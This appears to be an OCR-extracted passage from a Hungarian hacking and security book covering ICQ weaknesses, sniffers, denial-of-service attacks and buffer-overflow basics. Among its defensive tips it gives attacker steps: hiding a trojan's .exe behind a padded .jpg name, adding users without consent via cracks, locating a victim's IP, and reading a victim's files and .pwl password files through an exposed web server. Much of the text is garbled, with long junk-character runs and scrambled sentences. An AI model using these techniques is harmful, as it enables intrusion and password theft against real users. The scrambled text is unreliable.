a megfelelő információkat. 3. Az ICQ biztonsági kockázata azonban sokkal inkább annak a rendszernek a biztonságosságán múlik. Az ICQ minden felhasználója egy saját számot kap. 1. miután nagyon kényelmes és felhasználóbarát. hogy ez mit jelent).microsoft. Megjegyzés: A mail-támadásoktól eltekintve a számítógép Indítópult mappájába is előszeretettel másolnak ConCon-fájlt. az Away és az Invisible.biztonsági kockázat? Az utóbbi időben elszaporodtak azok a vélemények. mert a felhasználókat a UIN-on keresztül tudják más felhasználók megtalálni és azonosítani. a választék az Online. mert túl veszélyes". Ezek közül is egyértelműen az IP a legfontosabb. vagy ki akarja.1 Az ICQ . az Offline. minden alkalommal elindul ez a fájl. hogy „Van-e ICQ-d?" egyre gyakrabban kapjuk azt a választ. Ez a szám a Universal Identifier Number. hogy „Nem. Windows ICQ Client v. az e-mail címét vagy a UIN-t.4. vagy egyszerűen a UIN.praktikus és veszélyes Az „I seek you" egy kommunikációs eszköz. de az interneten egyre több program található. hogy a számítógép lefagyjon. és a kérdésre. Az ICQ kiszolgálóelemei és egy Sub7 szerver -üzenet Védelem a ConCon ellen A http://www. Ezeket a hálóról származó eszközökkel lehet végrehajtani. az IRC (InternetRelayChat) mellett az internet egyik legtöbbet használt chatrendszerévé fejlődött.2 ICQ .

Fájlnevek kitömése az ICQ 99 alatt Ahogy mailben. hogy azonnal eldobja az ismeretlen linkeket. Egy ilyen támadást hajtottak végre például tesztcélokból egy Windows 98 és egy 2000 platform „ellen". úgy ICQ-val is lehet fájlokat küldeni és fogadni. például egy trójait vagy egy vírust. itt nem lényeges információkkal.8. amelyeket nekünk küldenek. def. hogy az ICQ-kliensünket úgy állítjuk be.asp? A DADADADADADADADADADADADADADADADADADADADADADAD *-ADADADADADADADAD ^A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A *-DADADADADADADADAD *ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *»ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA *-DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *-ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA DADAD!Ü! pl A£)A£)A£)A£)A£)VA£)A£)A£)» *DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D ^•ADADADADADADADAD *ADADADADADADvADADADADADADADADADADADvADADADADA *»DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D ta»A£)A£)A£)A£)A£)A£)A£)A£) Védelem Ez ellen úgy lehet védekezni.com/link.2 Milyen biztonsági rések vannak? Korrupt linkek A különböző linkek megnyitása az ICQ-felhasználónál aktiválhat egy fájlt. A link így nézhet ki: http://www.jpg . hogy a támadó küld a usernek egy fájlt.jpg. És itt is működik az ott már leírt trükk: tegyük fel. Ha elküldi ezt a fájlt. a fogadónál megjelenik egy popup ablak a fájl megnevezésével és más.exe fájl nevét egy sor üres karakterrel. egy trójait vagy egy vírust stb. A trükk a következő: a támadó kitömi a def. Bizonyos parancsokkal összefüggésben azonban az egész merevlemezt is formattálhatják.4.yahoo. pl.exe Az exe fájlból semmit sem látni *-ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *ADADADADADADADAD h»ADADADADADADvADADADADADADADADADADADvADADADADA |*>DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D i*-ADADADADADADADAD *»D D D D D A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD ^A£)A£)A£)A£>A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A ^A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A A A A A .

Így a popup ablakban már nincs elég hely. Ha ez sikerült. a támadó már ott van a kívánt személy kapcsolati listáján. Rendesen ugyanis kap egy értesítést. User hozzáfűzése engedély nélkül Az ICQ jóváhagyása időnként elég terhes a támadóknak.172. Ezáltal az áldozat ICQ-ja bezáródik. Ha a hackernek csak az áldozat IP-je van meg. és a tulajdonképpeni végződés. Ez egy jó példa volt az ICQ kliens még fennálló bizonytalanságaira.exe már nem látható. Az interneten ehhez egész sor tool és crack van.40-et a megtalált IP-re cseréli. Ez az ICQ-path megadása után a kontaktlistára bejegyzett userek minden IP-jét visszaadja. akár meg is támadhatja. Ha a támadó például egy trójait vagy egy vírust használt. Ezt többnyire a fenti ikonra történő kattintással vagy a http://ipdesusers. anélkül. inaktiválja az ICQ-t. linkkel lehet elérni. hogy többet megtudjon a chat-partneréről. amelyek lehetővé teszik a felhasználó felvételét a kapcsolati listára anélkül. hogy működtetünk-e webszervert a rendszerünkön. Védekezés Az ICQ rendszeresen dolgozik chat-rendszere biztonságán.172. hogy megtámadja ezeket a rendszereket. a Find User-rel megkeresi azt az UIN-t. . és megpróbál hozzáfűzni egy felhasználót. amelyek azt mondják. hogy az ICQ nem tud üzeneteket küldeni. és egy idő múlva nem jelenik meg online-ként. Ezt a problémát elkerülendő. Egy ilyen jel a hackernek égből pottyant ajándék. amit gyakran ki is használ. hogy az áldozat ezt észrevenné. Ezután egyszerűen Quit-et ír a Telnet kliensbe.exe végződés helyett csak a -jpg-et látjuk. egyetlen kattintással kijelöli a személy nevét. és most is megjegyzendő. Mire minden hibaüzenetet tudomásul vettek. Vagy a támadó a partnerrel való beszélgetés közben egyszerűen beírja a parancssorba: netstat -n. Egy erre a célra szívesen használt eszköz a UIN-IP. Letölt magának egy ICQ-cracket az internetről.40:80. Az . amely közli. hogy felkerült egy listára. ha elfogadja és végrehajtja a fájlt. hogy tényleg csak egy képet akarnak küldeni neki. Most teljes nyugalomban megfigyelheti az áldozatát.82. A felhasználó azt gondolja. hogy az erről bármit is tudna. könnyen áldozat lesz. Az ICQ hibajelzéseket ad. Az így jelzett webszerver ugyanis behatolási pontot nyújthat a támadónak. ha egy áldozatot akarnak felvenni a kontaktlistájukra. Ezután meg kell szakítani a kapcsolatot a hálóval. Védelem Ez a bug az ICQ 2000-ben már nincs benne. ahol a 217. amelyet hozzá akar fűzni. hogy a felhasználó egy webszervert telepített. a Next-re kattint. a támadónak a következő lehetőségei vannak. Ha ezt elintézte. és a hacker ismerje az IP-jét. ráadásul anélkül. akkor a felhasználóból. Itt az IP! Az ICQ lefagyasztása ICQ alatt megmutathatjuk más felhasználóknak. vagy ha akarja. Amint az ICQ a kérdésre pozitív választ ad. Megnézni egy felhasználó fájljait Itt megintcsak előfeltétel.. Ezért a legjobb védekezés az aktuális verzióra történő frissítés.82. a parancssorba a következőt írja: Telnet 217. hogy ő bármit is észrevenne ebből. hogy a rendszeres frissítés legalább rövid távon védelmet kínál. megpatcheli a crackkel. az .

mert a támadó nem fogja ismerni a pontos könyvtárstruktúrát. hogy a C:\-hez jusson.82. A legtöbb esetben azonban a Windows szabvány könyvtárstruktúrája fordul elő.Most például beírhatná a böngészőjébe: http:// 217.82. amelyekre váltani kell.html/. Védekezés Ha webszervert kell futtatnunk.pwl. . ne használjuk ezen a gépen az ICQ-t.40 az áldozat IP címe.172. ahol a 217. Természetesen ez csak egy példa.172. user.40 /. A pontok a könyvtárakat jelölik. Most a támadó a számítógépére tudja menteni a kiválasztott fájlokat. így a jelszavak elérésére is van lehetőség.

4 Mi az a sniffer? Hogyan működik egy sniffer? A sniffer veszélyei Mit lehet tenni a snifferek ellen? .2 9. fejezet .9.1 9.Tartalom 9.3 9.

Ha elküldünk egy üzenetet. Az elfogott információkat a sniffer az output (kimeneti) fájlokba menü. ha azok nem az illető gépnek vannak címezve. betekintést kínálva annak. A többi hálózati interfész ugyan fogadja az adatokat. Ez különbözteti meg a komputert a hálózat többi tagjától. ethernet frame-nek is nevezett csomagokban kerül a hub-ra.1 Mi az a sniffer? A sniffereknek különböző felhasználási területeik vannak. Ez a mód bizonyos alkalmazásokon keresztül akkor is megengedi a csomagok felvételét és feldolgozását. és milyen gondokat okozhatnak.2 Hogyan működik egy sniffer? Egy számítógép valamennyi hálózati interfészének saját címe van a LAN-on. hogy a hálózat teljes adatforgalmát kiértékelje. és onnan továbbítódik minden csatlakoztatott számítógépre. Ezért a legtöbb sniffert úgy tervezték. hogy magállapítsa. mert a legtöbb információ egyáltalán nem érdekes. A felhasznált sniffertől függően különböző protokollokat lehet lehallgatni. Másrészt a snifferek lehetőséget nyújtanak a támadóknak. Ezek közé tartoznak többek között: a TCP/IP (Ethernet/WWW). Annak persze nem lenne értelme. a Banyán VINES és az LCC. Egyrészt a rendszergazdák pótolhatatlan segítőtársai a hálózati problémák vagy a potenciálisan veszélyeztetett területek felderítésében. de a nem neki szóló címzés miatt nem dolgozza fel azokat. az Apple Talk. 9. hogy egész hálózati csomagokat „hallgassanak le". 9. amely a hálózati interfészt úgynevezett promiscuous módra állítja át. Az adatokat csak az a számítógép veszi fel. és rendszerint egy fájlba írják az analizált adatokat.9 Sniffer A snifferek jelentik az egyik legnagyobb veszélyt a hálózatokra. Ezen a ponton avatkozik be a sniffer. Ha például gondok támadnak a hálózat egy részében a hiányos konfiguráció miatt. melyek a snifferek felhasználási területei. amelyiknek címezve vannak. az Az Analyzer az egyik legismertebb sniffer . az IPX. A hálózatban gyakran használnak hub-ot az adatok szétosztására. a sniffer tulajdonságaitól függően. akkor a rendszergazda bevethet egy sniffert. Ebből a fejezetből kiderül. Ezek. A snifferek a WWW/LAN/WAN egyes gépeire telepíthetők. naplózzák az adatfolyamot. aki installálta a sniffert. hogy csak a valóban releváns adatokkal foglalkozzon. Így a sniffer hozzákezdhet a tulajdonképpeni munkájához. hol van a probléma a hálózaton belül. külön kis. hogy mit is rejt ez a fogalom. Hasonló rendszert találunk az internet-címzésnél is. lehetnek például jelszavak vagy felhasználói nevek.

Ezek az eszközök azonban drágábbak az egyszerű hub-oknál. ráadásul csak a támadó gépén futnak. és a felhasználók sem veszik szívesen. ez a variáció. a normál hubokkal ellentétben. ha a hálózati kártya promiscuous módban van. hogy a fogadott adatokat minden vele kapcsolatban álló számítógépnek elküldi. tulajdonképpen semmit sem érnek. A csatlakozások ellenőrzése A rendszergazda is ellenőrizheti a LAN-ban található számítógépek hálózati kártyáit promiscuous módra vagy egyéb gyanús alkalmazásokra. amelyek csak egyszer érvényesek. amelyek. Intézkedés Adatelosztás Leírás Egy sniffer támadási pontját tulajdonképpen a hubnak az a tulajdonsága nyitja meg. Felhasználói oldalról titkosító protokollokkal. a reakcióideje hosszabb lesz az általában szokásosnál. mint az S/Key vagy a SecurelD-Token. a 3Com. azonban ahogy ez a protokoll majd szabvánnyá válik a hálón. Így azután nem is szükséges közvetlenül beavatkozni egy meghatározott felhasználó rendszerébe ahhoz. a hálózatba integrált notebookot használ. kevéssé hatékony. ha van egy saját. amit a sniffelés után magával visz. Ezeknél jelszavak kiosztásáról van szó. Sajnos ez az eljárás elég költséges. mert ezeket bármikor megtudhatja a sniffer. Nagyobb hálózatoknál megfontolandók az olyan biztonsági mechanizmusok. Ha azonban a támadó egy. amely Ipv6 vagy IPng néven ismert. Ez a protokoll Ipsec-et is tartalmaz. mint hogy nem tároljuk a jelszavakat a merevlemezen. a megoldás kézenfekvőnek tűnik: csak olyan hálózati kártyát szabad használni. hogy csak a címzett gép tudja dekódolni. a hub-ok helyett switcheket vagy auto-switching hub-okat is használhatunk.4 Mit lehet tenni a snifferek ellen? A snifferek felfedezéséhez és eltávolításához jól kell ismerni a hálózati topológiát. Titkosítás Az alkalmazásokban használt kódolás minden bizonnyal a legfontosabb védelem a sniffer-támadások ellen. Az olyan biztonsági intézkedések. . mint a fentiek. amely szintén kódolva továbbítja az adatokat. Ezeket használják akkor is. mert jobban szeretik. Titkosítással biztonságossá lehet tenni az adatátvitelt. Vannak programok. A snifferek a normál felhasználó szempontjából semmilyen nyomot nem hagynak maguk után. Az alábbi táblázatból részletesen megismerhetők a védelmi mechanizmusok. A reakcióidő ellenőrzése Ha egy számítógépre. Ezért a normál hálózati felhasználó aligha tudja felfedezni a sniffert a LAN-on. akkor jól be lehet határolni azt a számítógépet. A mail-postafiókok elleni támadásoknak is van egy biztos ellenszere.3 A sniffer veszélyei A snifferek nagy veszélyt jelentenek a hálózati struktúrára. adatokat küldenek. A leleplezéshez csak a rendszergazdáknak vannak különböző programjaik. amelyek tesztelni tudják a hálózati reakcióidőket. Ha biztosra akarunk menni. az IBM. mégpedig úgy. vagyis passzívan működnek. 9. a snifferek problémája is meg fog szűnni (egy időre). az S/POP nevű eljárás. védhetjük az adatainkat a siffherek ellen. amelyekről a továbbiakban még írni fogunk. amelynek a hálózati interfésze promiscuous módban van.9. amely nem engedélyezi ezt a módot. hogy kikémleljék mail-postafiókja vagy online banki jelszavát. éppúgy. valóban csak a célgépre továbbítják az adatokat. mert a teljes hálózati adatforgalmat felügyelhetik. Részletesen most nem foglalkozunk az Ipv6-tal. állandó jelszavuk. a Hewlett-Packard és az Intel. Ilyen kártyákat (is) kínai pl. Ha egy hálózatban rendszeresen tesztelik az egyes csatlakoztatott számítógépek reakcióidejét. Intézkedés Hálózati kártya Leírás Egyszerűbb és olcsóbb megoldás megfelelő hálózati kártyával felszerelni a LAN-ra csatlakoztatott számítógépeket. Mivel egy sniffer csak úgy tud működni. amikor egy hálózat teljesítményének a gyenge pontjait keresik. A döntően hálózati felhasználás azonban alapvetően nagyobb ráfordítást igénylő intézkedéseket tesz szükségessé. amelyik potenciális sniffer lehet. amelynél az adatok hálózati szinten lesznek kódolva. mint amilyen az SSH vagy az SSL. Ipv6 Hamarosan megjelenik a TCP/IP új verziója.

Már böngészőket is lehet kapni megfelelő erős kódolással. a kódolási folyamatnak automatikusnak is kellene lennie. ha egy másik számítógép éppen sniffel.c is ismert. mégsem kínálnak lehetőséget az adatok kódolására. A szokásos Telnet-kliensek helyett SSH-klienset (Secured Shell) is lehet használni. . új lehetőséget kellett fejleszteni. Ilyen program pl. Ha azonban a PGP-vel kódolt maileket a mail-szerveren nyitják meg (ami biztosan gyakran megtörténik). így ezt is minden sniffer foghatja. Az olyan programok. Az ilyen programokkal szemben azonban mindig egy kicsit szkeptikusnak kell maradni.Intézkedés Leírás A HTTP-átvitelek titkosítására szolgál az interneten az SSL (Secure Socket Layer). A PGP-vel vagy hasonló programokkal kódolt fájlok/mailek biztonságában is csak akkor lehet bízni. amelyek felhívják a figyelmet az ilyen támadásokra. Unixhoz/Linuxhoz a Beavis and Butthead. amely csak biztonságosan kódolva továbbítja az adatokat. elérhetik ugyan a céljukat. hogy milyen szolgáltatásokat veszünk igénybe a kevéssé biztonságos hálózatokon keresztül. Tehát figyelni kell arra. Igazán csak az IPv6 használatával lehet majd biztonságos adatátvitellel számolni. SSL SSH Mivel a Telnet kódolatlanul továbbítja az adatokat. amely mint snifftest. mivel ott az adatok eleve kódolva továbbítódnak. de nincs nagy hasznuk. így a sniffer nem tud mit kezdeni velük. amelyek azt a számítógépet ellenőrzik. amelyek leleplezik. hogy sok. Az e-mail-küldésnél mindenesetre problematikus. Védelmi Intézkedések a snifferek ellen Végeredményben azonban mindig lesznek programok. csupán mail-szolgáltatást kínáló szolgáltató csak üzletileg kínálja az SSL használatát. vagy olyan programokat használnak. mert többnyire csak bizonyos hálózati kártyák búgjait ellenőrzik. ha a fájlok megnyitása a saját gépen történik. amelyek ugyan hálózatról működnek. Mivel a legtöbb felhasználó nem szívesen használ manuális kódolást. Vannak azonban olyan programok is. például a jelszavakat és a parancsokat is. Anti-sniffer' A hálón a legkülönbözőbb programokat kínálják a snifferek felkutatásához. hogy védetten lehessen bejelentkezni a Telnetről. akkor a megnyitáshoz szükséges jelszó megint csak a hálózaton megy keresztül. amelyen éppen lokálisan rajta vagyunk.

4 Az IP-spoofing mint előfeltétel Out-of-Band csomagok .6 10.1 10.3 10.Tartalom 10.Distributed Denial of Service támadások Védelem a DoS-támadások ellen . fejezet.a „nuken" Large Packet-támadások avagy a Ping of Death Land támadások 10.8 10.7 10.10.9 Ping-Flodding Smurf DDoS .2 10.5 TCP-Syn-Flooding 10.

és ezeken egyenként körülbelül 40000 karaktert küldenek. A Microsoft felismerte ezt a hibát. két napon belül indították a Yahoo. amely lehetetlenné teszi hamisított IP-csomagok internetre küldését a csatlakoztatott hálózatüzemeltetőknél. A különböző támadásokhoz egész sor eszköz áll a támadók rendelkezésére. amelynél a csomag feladójának a címét megváltoztatják. vagy ha éppen az a célja.10 A Denial of Service támadás A DoS. A WinGatesszerver feltételezi. Vagy már a támadást is ez teszi lehetővé. hogy a rendszert lerohanja. mint például a WinGates. és a 139.szolgáltatás megtagadó) támadások az internet egyik legnagyobb veszélyforrásává váltak az idők során. Az OOB a TCP/IP egyik tulajdonsága. és megakadályozzák az azonosítását. Az Out of Band csomagok felhasználását a DoS-támadásokhoz a Microsoft egy hibás NetBEUI implementációja tette lehetővé. mert csak a szervezethez kapcsolódó rendszerekből érkező támadásokat akadályozza meg.1 Az IP-spoofing mint előfeltétel Az IP-spoofing egy támadási eljárás. Ha a 135. hogy minden Kettő a legismertebb nukerek közül 10. vagy arra szolgál. Megengedi az adatok átvitelét a normál sorrenden kívül. például a webszervereket. A rendszerek kiesése következtében fellépő kár mintegy 100 millió dollárra rúgott. A DoS-támadások az operációs rendszerek. A WinGates 4. csak a hencegése alapján kapták el egy idevágó chatszobában.(Denial of Service -. sok DoS-támadás alapját képzi. aki két napig bombázta a Yahoo-t és társait. és úgy lefagyasztják. amelynél hamis IP-számot használnak. programok és protokollok hibáit használják ki. mind a 2000-t ellenállóvá tette e támadások ellen. DoS-támadásokat többnyire akkor hajtanak végre. és mind a Windows 98/98SE/ME-t. Sajnos. Kedvelt célok azok a felhasználók is. a CNN és néhány más nagyobb portál ellen a hálón. hogy a támadó nyomait eltüntessék.többek között . akik game-szervereken vagy IRC-szervereken találhatók. ez csak egy behatárolt megoldás.Telnet session-ökhöz használják. hogy az egy ideig nem is tudja újrakezdeni a működését. hogy ezeknek a támadásoknak különböző fajtái vannak. így a támadónak még alaposabb technikai ismeretekkel sem kell rendelkeznie a használatukhoz. 1998-ban létrejött egy védelmi szervezet. Egy ilyen támadásnál számítógépeket rohannak le az interneten. A DoS-támadások célzott végrehajtásának másik oka lehet például. az eBay. hogy a rendszert egy időre lebénítsa.01-t például így lehetne megtámadni: 100 kapcsolatot állítanak elő a WinGates-hez. grafikus felületük van. Az eredmény azonban mindig ugyanaz: a megtámadott számítógép felmondja a szolgálatot. és ezzel a protokollal továbbítódik. amelyeknek többnyire jól kezelhető. a rendszer összeomlik. Az IP-spoofing. és . 10. Az egyik legismertebb támadást 2000 februárjában. Ezért az Out of Band csomagokat az olyan rendszerek megtámadásához használják. ha a támadó nem talál más utat. . ami azt jelenti. mint a szervereket. hogy hamis identitást színleljenek a megtámadott IT-rendszer felé. Így a támadót. hogy egy rendszert újraindításra kényszerítsenek valamilyen változtatás érvénybe léptetése érdekében (jelszó: trójai). A DoS-támadások ugyanúgy érintik az internet-felhasználókat. portok egy számukra nem értelmezhető karaktersort kapnak.a „nuken'' A legismertebb DoS-támadások közé tartozik a miken vagy az Out-ofBand (OOB) csomagok küldése.2 Out-of-Band csomagok .

és aztán újra reassemblálja (összerakja) őket. A szerver minden SYN-csomagra ACK-csomaggal válaszol. • A host válaszol a SYN 2-re. az rövid időn belül felmondja a szolgálatot. és a számítógép bizonyos várakozási idő után eredménytelennek nyilvánítja a kísérletet. Ez a túlméretezett csomag túlcsordulást (Buffer Overflow-t) okoz a rendszerben. A Ping of Death támadások a következő protokolloknál lehetségesek: ICMP. Ha most a rendszergazda megpróbál belépni. hogy egyszerűbb legyen az átvitelük. akkor speciális IP-csomagokat küld. elküldi az ACK 2-ét.3 Large Packet-támadások avagy a Ping of Death A Denial of Service támadások különösen végzetes fajtája a Ping of Death. Ezeket SYNcsomagoknak is nevezik. egy ilyen támadás lefolyásának a sémája. Ezek a tények teszik lehetővé.4 Land támadások A Land támadások a TCP-implementáció egy hibáját használják ki ahhoz. Röviddel a halálos lökés előtt Mikor egy számítógép kapcsolatot próbál felépíteni egy másikkal. out of buffer hibaüzenetet kap. A támadásnak ezt a fajtáját az elkészült bugfixekkel ma már a legtöbb operációs rendszer visszaveri. Mindez azért történik. majd összeomlást idézzenek elő. hogy egy rendszert hatalmas adatfolyammal terheljenek. és a gép összeomlik. íme. amelyről ebben a fejezetben még szó lesz. sikertelen lesz. • A támadó elküldi a SYN 3-at. vagyis „Beszélni akarok veled" üzenetet küld a hostra. hogy az utolsó töredéknek olyan offset értéket lehet adni. a protokoll-implementáció említett hibáját kihasználva. és megbénítja az áldozat rendszerét. hogy a hostot rettenetes mennyiségű további SYNcsomaggal bombázza. valamint a portszám. • És így tovább. Aki viszont Land támadást hajt végre. hamisított feladóval küldi a SYN-csomagokat egy szerverre . Az első csomagban még egy TCP-header is található. és várja a választ. de ezt a csomagot most egy saját nyitott portjára fogja küldeni.kapcsolat fennmarad. és az adattömeg addig halmozódik. Ha ezt a várakozási időt a támadó arra használja. 10. vagyis feldarabolja. és várja a választ az ACK l-re és 2-re. 10. hogy milyen csomagról van szó. amíg el nem használja a szerver pufferét.5 TCP-Syn-Flooding Mint ahogy a Land támadásoknál már leírtuk. hogy az adatok át tudjanak futni a különböző hálózati rétegeken. a nemlétező feladó miatt. • A támadó elküldi a SYN l-et. amelyekkel bejelenti a kapcsolatot. a résztvevők először egy Three Way Handshake-et váltanak. Az Internet Protokoll headerrel (fejléccel) együtt pontosan 65535 bájtot csomagol egyetlen csomagba. • A host válaszol a SYN l-re. Minden csomagtöredék tartalmaz egy offset értéket és egy azonosítási számot. A TCP-Syn-Flodding támadásnál a támadó először hamis feladóval nagy számú SYN-csomagot. amely meghatározza. • A támadó elküldi a SYN 2-t. A címzett reagál erre. Ez a következőképpen történik. Ez utóbbinak semmi köze a tulajdonképpeni ping-parancshoz. Ez a kísérlet azonban. . 10. kész vagyok" ACKválaszcsomaggal nyugtázni. és előállítani a kapcsolatot. Ezek ellen a támadások ellen is régóta létezik már bugfix.a feladó címe megegyezik a címzettel. Ezt a folyamatot Three Way Handshake-nek is nevezik. ahol a sok IP-stack egyfajta túlcsordulást idéz elő. A host ezt megpróbálja egy „OK. UDP és TCP. és válaszul ACK-csomagot (ACK = Acknowledgement = a fogadás nyugtázása) küld. ha két számítógép között TCP/IP-n keresztül jön létre kapcsolat. az Ethernet-csomagok pedig csak 1500 bájtosak. elküldi az ACK l-et. Az ennél nagyobb csomagokat fragmentálja. amely a teljes csomagot nagyobbnak mutatja 65535 bájtnál.

érdemes előfizetni a Computer Emergency Response Teams (CERT) levelezőlistájára http://www. amelyeken biztosítani tudja magának a rendszergazdai jogokat. hogy az áldozatát nagy mennyiségű adatcsomaggal szembesítse. amelyre minden.9 Védelem a DoS-támadások ellen A normál felhasználó számítógépe nemcsak áldozata lehet a DoStámadásoknak. Pingekkel bombázzák a célt. 10.org és a gyártóéra.vagy ISDN-csatlakozás) is térdre tudnak kényszeríteni nagy átviteli sávszélességgel rendelkező áldozatokat. és ha elérhető. azt eredményezik. s az áldozatot csomagok áradatával önti el. visszhangszerű választ ad. hogy a támadó a lehető legtöbb olyan rendszert megtalálja. hogy mindig legyen aktuális vírusvizsgáló a gépünkön. Ha az ismétlés elég gyakori. a host pedig valamennyire megpróbál válaszolni. hogy sor kerüljön a további feldolgozásukra.7 Smurf A Smurf-nél a támadó egy hálózat broadcast címére küld egy pinget manipulált feladócímmel.) Ha elegendő kiszolgálót talált. Megpingelünk egy hostot. ha a szolgáltatója a forgalom szerint számol el. A scripteket. Az érintett rendszer a bemenő adatok terhe alatt szó szerint összeomlik.cert. hogy fel tudja tölteni a scripteket a támadáshoz. ezeket feltölti scriptekkel vagy programokkal.10. hanem arra is használhatják a támadók. ezért is elengedhetetlen. 10. Legyen az szerver vagy normál felhasználó .6 Ping-Flodding A pingeket az interneten és a hálózatokban használják. hogy rajta keresztül hajtsák végre más rendszerek ellen a támadásokat. és ezeket arra használja. (A trójaikról a 4. Ezeken a rendszereken trójaiakat helyez el. mítógépeket. és meg lehet akadályozni. A gyártók előbb vagy utóbb felfedezik az operációs rendszerekben és a szerverszoftverekben a biztonsági szempontból gyenge pontokat. Ezt használják ki a támadók a Ping-Floddingnál. fejezetben írtunk. Ezek azonnal tájékoztatnak az újabb gyenge pontok felfedezéséről. A 2000. Hogy a gyenge pontok dolgában mindig képben legyünk. hogy minden választ az áldozat kap meg. Ez bizony rengeteg választ jelent. Ráadásul a ping-flodding támadásokat az áldozat csak akkor fogja észrevenni. A DoS-támadások ellen a jól konfigurált tűzfalak is védelmet kínálnak. a host nem tud több kérdésre válaszolni. az eBay és társai ellen.minden esetben érvényes. Az ilyen támadások után többnyire teljesen le kell venni a szervert a hálózatról. az áldozat több mint egymillió választ kap. Az előkészítés abból áll. hogy mindig tájékozódni kell a mindenkori operációs rendszer biztonságot érintő frissítéseiről. és beszerzési forrást kínálnak a megfelelő frissítésekhez. A megváltoztatott feladócímek. amitől az összeomlik. Előkészület egy DDoS támadásra 10.8 DDoSDistributed Denial of Service támadások A DDoS-nál (DDoS-támadás = elosztott szolgáltatás megtagadó támadás) még a tulajdonképpeni roham előtt szerez a támadó elérést néhány másik rendszerre. A segítségükkel el lehet kapni a módosított csomagokat. hogy távirányítani tudja a szá- . az áldozatéi. februári híres DDoS támadások óta állandóan növekszik az ilyen jellegű támadásokra alkalmas programok száma a Yahoo. Smurffel akár nagyon kis átviteli kapacitással rendelkező támadók (modem. Ehhez a támadó hibás rendszereket keres szkenneléssel (közelebbit lásd a szkennelésről szóló fejezetben). hogy megállapítsák egy host elérhetőségét. és rövid idő múlva frissítést kínálnak hozzájuk. a broadcast cím mögötti számítógép válaszol. Ha ilyen módon másodpercenként 1000 pinget küldenek 1000 különböző számítógépre. illetve a programokat többnyire trójaiak segítségével telepítik a rendszerekre.

2.Tartalom 11.5.1 Hogyan lehet ezt kihasználni? 11.3 11.2 A Buffer-Overflow-k és a tűzfalak .1. fejezet .11.2 Adatok 11.5 Áldozat a Buffer-Overflow-kért Honnan lehet felismerni a Buffer-Overflow-t? Milyen védelmi mechanizmusok vannak? 11.1.2. 11.1 Összefüggés a CPU és a Buffer-Overflow között.2 Hogyan működik? 11.4 11.2.1.2 A Buffer-Overflow-támadások 11.1 Szöveg 11.5.3 Minek kell a Shellcode változónál állnia? 11.1 Az operációs rendszer memóriakezelése 11.3 A stack (magyarul: halom/rakás) 11.

például a Súgó szövege. hogyan vezethet a rossz programozás biztonsági résekhez. Ez azt jelenti.1. first out) működik. amelyek . Ezeket a karakterláncokat az operációs rendszer „readonly"-ként kezeli.1. vagyis Buffer-Overflow támadásokhoz lehet felhasználni. Ennek a hozzárendelt területnek a méretét a „brk" paranccsal lehet megkapni. Alsó memória SZÖVEG inicializált adatok inicializálatlan adatok Felső memória STACK Memóriafelépítés 11. 11. Azokat az adatokat. mint amilyennel például a pipe-nál találkozhatunk. de távoli eléréssel is. ahelyett. amelyekkel az egész számítógép felett ellenőrzést szereznek.2 A Buffer-Overflow-támadások A Buffer-Owerflow tulajdonképpen annyit jelent.) Erről azonban később. amelyet egy program kiad. amelyekre egy program futása ugrik. Így végre lehet hajtani fizikai hozzáféréssel a szerverhez. hogy később speciális jogokat szerezzenek a szerverhez. mint amennyit az fel tud dolgozni. hogy az elemek. számú lap. amelyben a normál változók adatai találhatók. 1996-ban az AlephOne Bugtraq levelezőkör moderátora cikket közölt Smashing the Stack for Fun and Profit címen. elsőként kerülnek ki. Ezt úgy csinálják. vagyis ezeken nem lehet változtatni. A címek. hogy többet írnak a pufferbe. A legérdekesebb ezekben a támadásokban a Buffer-Overflow-rohamok függetlensége a támadó székhelyétől. mint egymásra halmozott lapokat.1. Más elérések „segmentation fault" hibával végződnek. amelyek legfelül helyezkednek el (tehát utoljára kerültek oda). ellentétben a FIFO-elvvel (first in. hogy megöröklik a megszakított szolgáltatás jogait. szintén a stackben tárolódnak (például a szegmensek kezdő címei. De arra is lehet használni ezeket a támadásokat.3 A stack (magyarul: halom/rakás) A stacket elképzelhetjük úgy. Ebben leírta. A stack az a memóriaterület. számú és legalul az 1. Egyes esetekben ez akár a boot-jogokig terjedhet. Ezzel egymásra épülő célokat lehet elérni: pl. megpróbálja beleírni. hogy támadásokat hajtsanak végre szerverek ellen. ha egy eljárás vagy függvény lefutott. Az alsó memóriában illetve a szövegrészben csak karakterláncok vannak tárolva. amelyek már nem férnek be a pufferba. A stack szerkesztésének legfontosabb assembler parancsai a PUSH (adatokat tesz a stackhez) és a POP (olvassa a stack legfelső elemét). amelyeket aztán puffer-túlcsordulásos. Ennek következtében az .1 Szöveg Egy adott programhoz rendelt memóriatartomány több részre oszlik.static"-ként deklarálódnak. A stack LIFO-elven (last in. A Buffer-Overflow-rohamokat arra használják. hogy eldobná a program. egy bizonyos szolgáltatást összeomlásra kényszeríteni. first out).. hogy kidöntsenek egy weboldalt.1 Az operációs rendszer memóriakezelése Az alábbi vázlat egy operációs rendszer memóriafelépítését szemlélteti. 11.11 Buffer-Overflow 11. 11.2 Adatok Az adatrész inicializált és inicializálatlan adatokra osztható. ahol legfelül van a 10.

